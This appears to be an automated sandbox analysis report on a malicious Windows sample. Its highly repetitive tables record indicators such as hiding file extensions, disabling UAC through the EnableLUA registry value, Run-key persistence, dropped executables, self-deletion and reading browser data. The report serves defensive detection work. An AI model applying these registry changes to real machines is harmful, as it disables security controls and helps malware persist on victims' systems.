Analysis Overview
SHA256
2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2
Threat Level: Known bad
The file 2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N was found to be: Known bad.
Malicious Activity Summary
Modifies visibility of file extensions in Explorer
UAC bypass
Renames multiple (58) files with added filename extension
Renames multiple (77) files with added filename extension
Deletes itself
Reads user/profile data of web browsers
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Adds Run key to start application
Drops file in System32 directory
Program crash
Enumerates physical storage devices
Unsigned PE
System Location Discovery: System Language Discovery
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
Modifies registry key
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-10-26 00:45
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-26 00:45
Reported
2024-10-26 00:47
Platform
win7-20240903-en
Max time kernel
120s
Max time network
65s
Command Line
Signatures
Modifies visibility of file extensions in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Renames multiple (58) files with added filename extension
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\joQgYIAY\FMcQwsEQ.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\joQgYIAY\FMcQwsEQ.exe | N/A |
| N/A | N/A | C:\ProgramData\vMQAkIIk\LyYAcIUU.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\FMcQwsEQ.exe = "C:\\Users\\Admin\\joQgYIAY\\FMcQwsEQ.exe" | C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\LyYAcIUU.exe = "C:\\ProgramData\\vMQAkIIk\\LyYAcIUU.exe" | C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\FMcQwsEQ.exe = "C:\\Users\\Admin\\joQgYIAY\\FMcQwsEQ.exe" | C:\Users\Admin\joQgYIAY\FMcQwsEQ.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\LyYAcIUU.exe = "C:\\ProgramData\\vMQAkIIk\\LyYAcIUU.exe" | C:\ProgramData\vMQAkIIk\LyYAcIUU.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
